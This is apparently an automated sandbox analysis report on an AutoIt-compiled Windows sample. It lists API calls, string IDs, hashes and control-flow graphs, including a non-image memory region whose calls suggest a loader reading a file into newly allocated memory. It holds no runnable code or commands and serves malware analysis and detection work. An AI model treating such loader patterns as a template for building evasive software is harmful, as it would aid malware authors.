                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00475C82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbO$pbO$pbO$pbO
                                                              • API String ID: 4212290369-442891389
                                                              • Opcode ID: 495029d5131f31ad34cbbe535ce8487d3abf3d7615e07785d0cef0db0d4663bc
                                                              • Instruction ID: b46cb7ef234b6ad573a81df93f563271d8dbb332f0387a95d7ad7de89852f9ed
                                                              • Opcode Fuzzy Hash: 495029d5131f31ad34cbbe535ce8487d3abf3d7615e07785d0cef0db0d4663bc
                                                              • Instruction Fuzzy Hash: E2B2A370608741DFD724DF24C885BAAB7E4BF84304F14892FE54D9B2A1C7B9E855CB8A

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00498F5F: __time64.LIBCMT ref: 00498F69
                                                                • Part of subcall function 00434EE5: _fseek.LIBCMT ref: 00434EFD
                                                              • __wsplitpath.LIBCMT ref: 00499234
                                                                • Part of subcall function 004540FB: __wsplitpath_helper.LIBCMT ref: 0045413B
                                                              • _wcscpy.LIBCMT ref: 00499247
                                                              • _wcscat.LIBCMT ref: 0049925A
                                                              • __wsplitpath.LIBCMT ref: 0049927F
                                                              • _wcscat.LIBCMT ref: 00499295
                                                              • _wcscat.LIBCMT ref: 004992A8
                                                                • Part of subcall function 00498FA5: _memmove.LIBCMT ref: 00498FDE
                                                                • Part of subcall function 00498FA5: _memmove.LIBCMT ref: 00498FED
                                                              • _wcscmp.LIBCMT ref: 004991EF
                                                                • Part of subcall function 00499734: _wcscmp.LIBCMT ref: 00499824
                                                                • Part of subcall function 00499734: _wcscmp.LIBCMT ref: 00499837
                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00499452
                                                              • _wcsncpy.LIBCMT ref: 004994C5
                                                              • DeleteFileW.KERNEL32(?,?), ref: 004994FB
                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00499511
                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00499522
                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00499534
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                              • String ID:
                                                              • API String ID: 1500180987-0
                                                              • Opcode ID: 0cae97fe31b6b839396d8498f11c46e5d892fb0ddb46f5c89bba4e25b8bf2d43
                                                              • Instruction ID: 5b1ad0255ef311961927bb43edc1ac0126f407b63f101533955e2eb12c04584a
                                                              • Opcode Fuzzy Hash: 0cae97fe31b6b839396d8498f11c46e5d892fb0ddb46f5c89bba4e25b8bf2d43
                                                              • Instruction Fuzzy Hash: 5EC14FB1D00219ABDF11DF95CC85ADEBBB8EF49314F0040ABF609E6141DB349E448F69

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00433074
                                                              • RegisterClassExW.USER32(00000030), ref: 0043309E
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004330AF
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004330CC
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004330DC
                                                              • LoadIconW.USER32(000000A9), ref: 004330F2
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00433101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 807c4d888c9f6e1e84f07b5e0a7873e895a4a998b382bbf671b8326816f60460
                                                              • Instruction ID: 0d33cec71e7d395dc7959dbbce282e4fe3d693ab43bf20869e17996868c8262a
                                                              • Opcode Fuzzy Hash: 807c4d888c9f6e1e84f07b5e0a7873e895a4a998b382bbf671b8326816f60460
                                                              • Instruction Fuzzy Hash: F0315871805348AFDB10DFA4EC84AEABFF4FB09310F1442AEE584E62A1D7B50565CF99

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00433074
                                                              • RegisterClassExW.USER32(00000030), ref: 0043309E
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004330AF
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004330CC
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004330DC
                                                              • LoadIconW.USER32(000000A9), ref: 004330F2
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00433101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 86b9bc8b144f8a9b3923a93e29c2db4410a18c2b66e17fa730d282c3f823bd9b
                                                              • Instruction ID: 1732837aa14026671a25cf4894b9707b70cc6691c6fc46b2a0aac02e6b762c7a
                                                              • Opcode Fuzzy Hash: 86b9bc8b144f8a9b3923a93e29c2db4410a18c2b66e17fa730d282c3f823bd9b
                                                              • Instruction Fuzzy Hash: 5821F9B1910618AFDB00EF94EC48BDDBBF4FB08710F10427AF614A62A0D7B54564CFA9

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00434706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004F52F8,?,004337AE,?), ref: 00434724
                                                                • Part of subcall function 0045050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00437165), ref: 0045052D
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004371A8
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0046E8C8
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0046E909
                                                              • RegCloseKey.ADVAPI32(?), ref: 0046E947
                                                              • _wcscat.LIBCMT ref: 0046E9A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                              • API String ID: 2673923337-2727554177
                                                              • Opcode ID: 3876edb0ef78c02bf5506ad9ebeb714d78355be61910c22d7c4785f242b4577a
                                                              • Instruction ID: 9d61f5cc8490c0f0252218b90ece18ce06f629e4d2c2607ba00ce7deb0856a77
                                                              • Opcode Fuzzy Hash: 3876edb0ef78c02bf5506ad9ebeb714d78355be61910c22d7c4785f242b4577a
                                                              • Instruction Fuzzy Hash: AC716EB15083019EC310EF2AEC419ABBBE8FF58314F42453FF485872A1EB759948CB5A

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 760 433633-433681 762 433683-433686 760->762 763 4336e1-4336e3 760->763 765 4336e7 762->765 766 433688-43368f 762->766 763->762 764 4336e5 763->764 767 4336ca-4336d2 DefWindowProcW 764->767 768 46d0cc-46d0fa call 441070 call 441093 765->768 769 4336ed-4336f0 765->769 770 433695-43369a 766->770 771 43374b-433753 PostQuitMessage 766->771 772 4336d8-4336de 767->772 803 46d0ff-46d106 768->803 773 4336f2-4336f3 769->773 774 433715-43373c SetTimer RegisterWindowMessageW 769->774 776 46d154-46d168 call 492527 770->776 777 4336a0-4336a2 770->777 778 433711-433713 771->778 779 46d06f-46d072 773->779 780 4336f9-43370c KillTimer call 43443a call 433114 773->780 774->778 782 43373e-433749 CreatePopupMenu 774->782 776->778 794 46d16e 776->794 783 433755-433764 call 4344a0 777->783 784 4336a8-4336ad 777->784 778->772 787 46d074-46d076 779->787 788 46d0a8-46d0c7 MoveWindow 779->788 780->778 782->778 783->778 791 4336b3-4336b8 784->791 792 46d139-46d140 784->792 796 46d097-46d0a3 SetFocus 787->796 797 46d078-46d07b 787->797 788->778 801 46d124-46d134 call 492d36 791->801 802 4336be-4336c4 791->802 792->767 799 46d146-46d14f call 487c36 792->799 794->767 796->778 797->802 804 46d081-46d092 call 441070 797->804 799->767 801->778 802->767 802->803 803->767 808 46d10c-46d11f call 43443a call 43434a 803->808 804->778 808->767
                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 004336D2
                                                              • KillTimer.USER32(?,00000001), ref: 004336FC
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0043371F
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0043372A
                                                              • CreatePopupMenu.USER32 ref: 0043373E
                                                              • PostQuitMessage.USER32(00000000), ref: 0043374D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated$%L
                                                              • API String ID: 129472671-928395405
                                                              • Opcode ID: 03b2d50b9c0327c5d05fee9e5f5b21530a941353bfb529305d0745d74df9d05d
                                                              • Instruction ID: 6222010d553096697b79701babbc3ac5d0e23902ac4890275c8ce34cc246111b
                                                              • Opcode Fuzzy Hash: 03b2d50b9c0327c5d05fee9e5f5b21530a941353bfb529305d0745d74df9d05d
                                                              • Instruction Fuzzy Hash: E6411BB1A00505BFDB246F78DC0AB7A3B54E708342F10523BF601963A1DB6C9E65976E

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00433A50
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00433A5F
                                                              • LoadIconW.USER32(00000063), ref: 00433A76
                                                              • LoadIconW.USER32(000000A4), ref: 00433A88
                                                              • LoadIconW.USER32(000000A2), ref: 00433A9A
                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00433AC0
                                                              • RegisterClassExW.USER32(?), ref: 00433B16
                                                                • Part of subcall function 00433041: GetSysColorBrush.USER32(0000000F), ref: 00433074
                                                                • Part of subcall function 00433041: RegisterClassExW.USER32(00000030), ref: 0043309E
                                                                • Part of subcall function 00433041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004330AF
                                                                • Part of subcall function 00433041: InitCommonControlsEx.COMCTL32(?), ref: 004330CC
                                                                • Part of subcall function 00433041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004330DC
                                                                • Part of subcall function 00433041: LoadIconW.USER32(000000A9), ref: 004330F2
                                                                • Part of subcall function 00433041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00433101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026
                                                              • Opcode ID: ebc0d9cf38fd9959ade260f377e600ef81beda1e0fbe46c91e57aa527d15d8f6
                                                              • Instruction ID: 7e6b806a180d9ec01bef45fcd37491090d89392b3924435fcb9c426f75ced8cf
                                                              • Opcode Fuzzy Hash: ebc0d9cf38fd9959ade260f377e600ef81beda1e0fbe46c91e57aa527d15d8f6
                                                              • Instruction Fuzzy Hash: B3214B74D00704AFEB10DFA4EC09BAD7FB0FB08725F1142BAE604A62A1D7B55664CF98

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RO
                                                              • API String ID: 1825951767-1941922701
                                                              • Opcode ID: 6ae9de59f149a1e55c591a99dbe189a70f88ba152736c7b8ea19090351df6cff
                                                              • Instruction ID: 7dd5fe227b8beb4ee2597658067fcee7e5ed6e6896fa75398501987325c71428
                                                              • Opcode Fuzzy Hash: 6ae9de59f149a1e55c591a99dbe189a70f88ba152736c7b8ea19090351df6cff
                                                              • Instruction Fuzzy Hash: F5A16B71D0021DAACB04EFA5DC92AEEB778BF19305F00152FF415A7191EF786A08CB69

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00450162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00450193
                                                                • Part of subcall function 00450162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0045019B
                                                                • Part of subcall function 00450162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004501A6
                                                                • Part of subcall function 00450162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004501B1
                                                                • Part of subcall function 00450162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004501B9
                                                                • Part of subcall function 00450162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004501C1
                                                                • Part of subcall function 004460F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0043F930), ref: 00446154
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0043F9CD
                                                              • OleInitialize.OLE32(00000000), ref: 0043FA4A
                                                              • CloseHandle.KERNEL32(00000000), ref: 004745C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID: <WO$\TO$%L$SO
                                                              • API String ID: 1986988660-3744586639
                                                              • Opcode ID: 8b226273d88f2e68c6709d06bc4bf425ea532b7612d50aa5b2155952f3c4f22b
                                                              • Instruction ID: 7fe029b97eeea0af872e1f784dd930d818ed35070a2e202a9a5b93ed50041eb6
                                                              • Opcode Fuzzy Hash: 8b226273d88f2e68c6709d06bc4bf425ea532b7612d50aa5b2155952f3c4f22b
                                                              • Instruction Fuzzy Hash: 6C81ABB0901E409FD384EF2AA9457397BE5EB8830AB51813F9719CB272E77844A4CF1D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 983 1f925e0-1f9268e call 1f90000 986 1f92695-1f926bb call 1f934f0 CreateFileW 983->986 989 1f926bd 986->989 990 1f926c2-1f926d2 986->990 991 1f9280d-1f92811 989->991 998 1f926d9-1f926f3 VirtualAlloc 990->998 999 1f926d4 990->999 992 1f92853-1f92856 991->992 993 1f92813-1f92817 991->993 995 1f92859-1f92860 992->995 996 1f92819-1f9281c 993->996 997 1f92823-1f92827 993->997 1000 1f92862-1f9286d 995->1000 1001 1f928b5-1f928ca 995->1001 996->997 1002 1f92829-1f92833 997->1002 1003 1f92837-1f9283b 997->1003 1004 1f926fa-1f92711 ReadFile 998->1004 1005 1f926f5 998->1005 999->991 1006 1f9286f 1000->1006 1007 1f92871-1f9287d 1000->1007 1008 1f928da-1f928e2 1001->1008 1009 1f928cc-1f928d7 VirtualFree 1001->1009 1002->1003 1010 1f9284b 1003->1010 1011 1f9283d-1f92847 1003->1011 1012 1f92718-1f92758 VirtualAlloc 1004->1012 1013 1f92713 1004->1013 1005->991 1006->1001 1016 1f9287f-1f9288f 1007->1016 1017 1f92891-1f9289d 1007->1017 1009->1008 1010->992 1011->1010 1014 1f9275a 1012->1014 1015 1f9275f-1f9277a call 1f93740 1012->1015 1013->991 1014->991 1023 1f92785-1f9278f 1015->1023 1019 1f928b3 1016->1019 1020 1f928aa-1f928b0 1017->1020 1021 1f9289f-1f928a8 1017->1021 1019->995 1020->1019 1021->1019 1024 1f92791-1f927c0 call 1f93740 1023->1024 1025 1f927c2-1f927d6 call 1f93550 1023->1025 1024->1023 1031 1f927d8 1025->1031 1032 1f927da-1f927de 1025->1032 1031->991 1033 1f927ea-1f927ee 1032->1033 1034 1f927e0-1f927e4 CloseHandle 1032->1034 1035 1f927fe-1f92807 1033->1035 1036 1f927f0-1f927fb VirtualFree 1033->1036 1034->1033 1035->986 1035->991 1036->1035
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01F926B1
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01F928D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2137747443.0000000001F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1f90000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CreateFileFreeVirtual
                                                              • String ID:
                                                              • API String ID: 204039940-0
                                                              • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                              • Instruction ID: e2f8f5ee6c562f6b314670df0f977375a2bd377a2823a3ee9d04747beca891d8
                                                              • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                              • Instruction Fuzzy Hash: F2A1F675E00209EBEF14DFA4C994BEEBBB5BF48304F208159E601BB281D7769A41CF95

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1114 4339d5-433a45 CreateWindowExW * 2 ShowWindow * 2
                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00433A03
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00433A24
                                                              • ShowWindow.USER32(00000000,?,?), ref: 00433A38
                                                              • ShowWindow.USER32(00000000,?,?), ref: 00433A41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$edit
                                                              • API String ID: 1584632944-3779509399
                                                              • Opcode ID: 33b270fbb94111eb4d132423673b37cad156b1ff3bbfb15398d58c67e3840c7e
                                                              • Instruction ID: 71d4d4ca74fa2381b3ad87fce2d46482f59a67401a953560a5379dd2f10d2e71
                                                              • Opcode Fuzzy Hash: 33b270fbb94111eb4d132423673b37cad156b1ff3bbfb15398d58c67e3840c7e
                                                              • Instruction Fuzzy Hash: 19F03A705002907EEA305B2B6C0CE7B2E7DD7C6F50B1242BABA04E2170C6650820CEB9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1467 1f923b0-1f924d7 call 1f90000 call 1f922a0 CreateFileW 1474 1f924d9 1467->1474 1475 1f924de-1f924ee 1467->1475 1476 1f9258e-1f92593 1474->1476 1478 1f924f0 1475->1478 1479 1f924f5-1f9250f VirtualAlloc 1475->1479 1478->1476 1480 1f92511 1479->1480 1481 1f92513-1f9252a ReadFile 1479->1481 1480->1476 1482 1f9252c 1481->1482 1483 1f9252e-1f92568 call 1f922e0 call 1f912a0 1481->1483 1482->1476 1488 1f9256a-1f9257f call 1f92330 1483->1488 1489 1f92584-1f9258c ExitProcess 1483->1489 1488->1489 1489->1476
                                                              APIs
                                                                • Part of subcall function 01F922A0: Sleep.KERNELBASE(000001F4), ref: 01F922B1
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01F924CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2137747443.0000000001F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1f90000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CreateFileSleep
                                                              • String ID: GJ9UX6DKB2QJXJB
                                                              • API String ID: 2694422964-4204639856
                                                              • Opcode ID: 289dde00aad2f02ae99932ac3e702bb57337e5d5e5a2272f0593ce59dc4bcef9
                                                              • Instruction ID: dd9a1e66938174aff19cf6777e2c1f15b8a914eb4c40ada2816bdbd67aa1b7d3
                                                              • Opcode Fuzzy Hash: 289dde00aad2f02ae99932ac3e702bb57337e5d5e5a2272f0593ce59dc4bcef9
                                                              • Instruction Fuzzy Hash: 48518231D04249EBEF15EBE4C814BEEBB79AF55300F004198E609BB2C1D7BA1B49CB65

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1491 43407c-434092 1492 434098-4340ad call 437a16 1491->1492 1493 43416f-434173 1491->1493 1496 4340b3-4340d3 call 437bcc 1492->1496 1497 46d3c8-46d3d7 LoadStringW 1492->1497 1500 46d3e2-46d3fa call 437b2e call 436fe3 1496->1500 1501 4340d9-4340dd 1496->1501 1497->1500 1510 4340ed-43416a call 452de0 call 43454e call 452dbc Shell_NotifyIconW call 435904 1500->1510 1513 46d400-46d41e call 437cab call 436fe3 call 437cab 1500->1513 1503 4340e3-4340e8 call 437b2e 1501->1503 1504 434174-43417d call 438047 1501->1504 1503->1510 1504->1510 1510->1493 1513->1510
                                                              APIs
                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0046D3D7
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
